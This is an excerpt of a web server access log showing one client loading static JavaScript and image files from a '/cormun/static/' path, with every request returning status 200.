129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_layers.js HTTP/1.1" 200 4114
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oav.js HTTP/1.1" 200 645
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oavdivfix.js HTTP/1.1" 200 639
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_scrolldiv.js HTTP/1.1" 200 4138
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_popup.js HTTP/1.1" 200 15149
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_picture.js HTTP/1.1" 200 689
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabdivfix.js HTTP/1.1" 200 898
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabs.js HTTP/1.1" 200 3748
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_upload.js HTTP/1.1" 200 1423
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/PXToolsJavascriptsRender.js HTTP/1.1" 200 367
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Resources/CormunMP2.png HTTP/1.1" 200 6878
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Resources/ImgHome.png HTTP/1.1" 200 1364
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Resources/Llave.png HTTP/1.1" 200 1395
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/RunJS/RunJS.js HTTP/1.1" 200 288
